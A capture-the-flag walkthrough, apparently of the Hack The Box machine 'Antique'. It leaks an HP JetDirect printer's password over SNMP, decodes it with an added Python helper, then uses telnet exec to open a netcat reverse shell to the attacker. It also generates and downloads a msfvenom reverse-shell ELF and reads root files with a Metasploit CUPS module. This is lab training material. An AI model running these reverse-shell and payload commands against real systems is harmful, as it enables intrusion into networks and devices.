# Antique

## Nmap

```
sudo nmap 10.10.11.107 -p- -sS -sV

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
```

With only a single TCP port returned by `nmap`, we also scan UDP for any open ports.

```
sudo nmap 10.10.11.107 -sU -F

PORT    STATE SERVICE
161/udp open  snmp
```

Connecting to telnet on port 23, the banner identifies the target as an HP JetDirect printer.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu9mKKX5PU3fuf8poD4Qd%2Fimage.png?alt=media\&token=28830114-12fb-4a7e-a2ee-14813ef951c2)

A few default passwords prove unsuccessful. Searching Google for JetDirect exploits turns up a great article from IronGeek: <http://www.irongeek.com/i.php?page=security/networkprinterhacking>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FStkxF2ttxlJqOc5mwe1v%2Fimage.png?alt=media\&token=df22593a-7e3e-4aa5-af55-0ed2abd50ddc)

As per the article, we try the same technique: reading the JetDirect password OID over SNMP with the default `public` community string.

```bash
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9d1UDx6tM4l6TMy9hq7f%2Fimage.png?alt=media\&token=b4306874-6c71-4411-bc16-dd89115f2b6f)

The resulting `BITS` value is a sequence of hex bytes; it can be taken over to CyberChef and decoded from Hex to plaintext.

**CyberChef:** <https://gchq.github.io/CyberChef>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKNiI5RPsRBE7JxwVD1d9%2Fimage.png?alt=media\&token=463f9452-e015-4f6c-8ad7-cdb4badbf183)
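The same Hex-to-text decoding that CyberChef performs, as an added example that is not part of the original writeup. The input line is constructed to resemble `snmpget` output for the OID above; the assumption that net-snmp's trailing bit-index list starts with a token that is not a two-digit hex byte is mine.

```python
import re

# Constructed sample modelled on net-snmp output for the JetDirect password
# OID. The hex bytes spell the password recovered on this page followed by a
# newline (0A); the trailing "1 3 9" imitates the set-bit index list that
# net-snmp prints after a BITS value.
SAMPLE = ("iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: "
          "50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33 0A 1 3 9")

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")


def bits_to_bytes(line: str) -> bytes:
    """Return the raw bytes encoded in a 'BITS:' value printed by snmpget."""
    if "BITS:" not in line:
        raise ValueError("not a BITS value: %r" % line)
    tokens = line.split("BITS:", 1)[1].split()
    out = bytearray()
    for tok in tokens:
        # Assumption: the first token that is not exactly two hex digits
        # begins net-snmp's decimal bit-index list, so the data ends there.
        if not HEX_BYTE.match(tok):
            break
        out.append(int(tok, 16))
    return bytes(out)


def bits_to_text(line: str) -> list:
    """Decode the BITS bytes as ASCII and split into non-empty lines; the
    JetDirect value may carry several newline-separated strings."""
    text = bits_to_bytes(line).decode("ascii", errors="replace")
    return [ln for ln in text.split("\n") if ln]


if __name__ == "__main__":
    for ln in bits_to_text(SAMPLE):
        print(ln)
```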

We now have the password `P@ssw0rd@123!!123` which can be used to authenticate over `telnet`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9O07HzrvFmQREYjnh1ii%2Fimage.png?alt=media\&token=49654e36-7e7c-4beb-ac6b-96a9e41dfd14)

From the `?` output above we see the `exec` command can be used to perform system commands.

Running the following command shows `nc` is installed on the target system.

```bash
exec which nc
```

A `nc` listener is set up on the attacking system, and the following command is executed in the target `telnet` session to receive a reverse shell.

```bash
exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <Port> >/tmp/f
```

We then receive a shell on our `nc` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FL5BN5zmbvvrybcm2z5Qw%2Fimage.png?alt=media\&token=0a49b7c3-f3a3-4fba-bff6-6959511453ec)

After grabbing the user flag, we perform some basic enumeration against the target system. Looking through the CUPS configuration files we notice the target is running CUPS 1.6.1.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FWfRl30V52bV33zfEmkJA%2Fimage.png?alt=media\&token=fec89006-7779-405e-baa6-b88fc062ad6b)

Searching Google shows this version of CUPS is affected by a root file read vulnerability.

**URL:** <https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/>

As this is a `metasploit` post module we will need a `meterpreter` session.

Firstly, an x86 `elf` payload was generated.

```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f elf -o reverse.elf
```

A `multi/handler` listener was then set up in `msfconsole`, with the payload matching the x86 payload generated above.

```bash
msfconsole -q -x "use multi/handler; set payload linux/x86/shell_reverse_tcp; set lhost <IP>; set lport <Port>; exploit"
```

The payload was then downloaded onto the target system and executed.

```bash
# Download the payload from the attacking system
wget http://<IP>/reverse.elf

# Make the payload executable
chmod +x reverse.elf

# Execute
./reverse.elf
```

This catches a command shell in the `metasploit` handler.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FrpreBAWVPmawNfazThy6%2Fimage.png?alt=media\&token=bf874a0f-40f5-4b94-ac9f-785da60ca52b)

After this, the following `metasploit` module was used to upgrade the command shell to a `meterpreter` session.

```bash
use post/multi/manage/shell_to_meterpreter
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbZoykivE0HNfJPMDfKhP%2Fimage.png?alt=media\&token=173d468b-8325-44f9-8bbe-6f9fee96adae)

The following module was then selected for the CUPS root file read.

```bash
use post/multi/escalate/cups_root_file_read
```

`root.txt` was set as the file to read and the module executed, successfully reading the `root.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVVYyLkk15VblGR6O1rmT%2Fimage.png?alt=media\&token=033a5c95-db75-4714-b7e2-c7e0c320d791)